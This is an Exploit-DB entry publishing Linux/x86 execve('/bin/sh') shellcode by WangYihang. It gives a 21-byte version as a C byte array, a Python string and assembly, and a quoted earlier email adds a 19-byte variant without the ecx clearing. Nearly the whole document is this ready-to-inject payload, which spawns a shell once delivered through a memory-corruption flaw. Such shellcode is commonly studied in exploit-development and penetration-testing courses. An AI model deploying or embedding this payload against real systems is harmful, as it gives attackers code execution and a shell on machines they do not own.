Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)

EDB-ID:

41757

CVE:

N/A




Platform:

Linux_x86

Date:

2017-03-29


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

;================================================================================
Linux/x86 - execve(/bin/sh") shellcode (21 bytes)
;================================================================================
; The MIT License
;
; Copyright (c) <year> <copyright holders>
;
; Permission is hereby granted, free of charge, to any person obtaining a copy
; of this software and associated documentation files (the "Software"), to deal
; in the Software without restriction, including without limitation the rights
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
; copies of the Software, and to permit persons to whom the Software is
; furnished to do so, subject to the following conditions:
; 
; The above copyright notice and this permission notice shall be included in
; all copies or substantial portions of the Software.
; 
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
; THE SOFTWARE.
;================================================================================
;     Name : Linux/x86 - execve(/bin/sh") shellcode (21 bytes)
;     Author : WangYihang
;     Email : wangyihanger@gmail.com
;     Tested on: Linux_x86
;     Shellcode Length: 21
;================================================================================
; Shellcode : 
	char shellcode[] = "\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
;================================================================================
; Python : 
        shellcode = "\x31\xc9\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
;================================================================================
; Assembly language code : 
global _start
        _start:
                xor ecx, ecx
                push 0bH
                pop eax
                cdq
                push edx
                push "//sh"
                push "/bin"
                mov ebx, esp
                int 80H
;================================================================================

2017-03-29 12:27 GMT+08:00 wangyihanger@gmail.com <wangyihanger@gmail.com>:

    Linux/x86 - execve(/bin/sh") shellcode (19 bytes)
    ;================================================================================
    ; The MIT License
    ;
    ; Copyright (c) <year> <copyright holders>
    ;
    ; Permission is hereby granted, free of charge, to any person obtaining a copy
    ; of this software and associated documentation files (the "Software"), to deal
    ; in the Software without restriction, including without limitation the rights
    ; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
    ; copies of the Software, and to permit persons to whom the Software is
    ; furnished to do so, subject to the following conditions:
    ; 
    ; The above copyright notice and this permission notice shall be included in
    ; all copies or substantial portions of the Software.
    ; 
    ; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
    ; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
    ; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
    ; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
    ; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
    ; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
    ; THE SOFTWARE.
    ;================================================================================
    ;     Name : Linux/x86 - execve(/bin/sh") shellcode (19 bytes)
    ;     Author : WangYihang
    ;     Email : wangyihanger@gmail.com
    ;     Tested on: Linux_x86
    ;     Shellcode Length: 19
    ;================================================================================
    ; Shellcode : 
    	char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    ;================================================================================
    ; Python : 
            shellcode = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
    ;================================================================================
    ; Assembly language code : 
    global _start
            _start:
                    push 0bH
                    pop eax
                    cdq
                    push edx
                    push "//sh"
                    push "/bin"
                    mov ebx, esp
                    int 80H
    ;================================================================================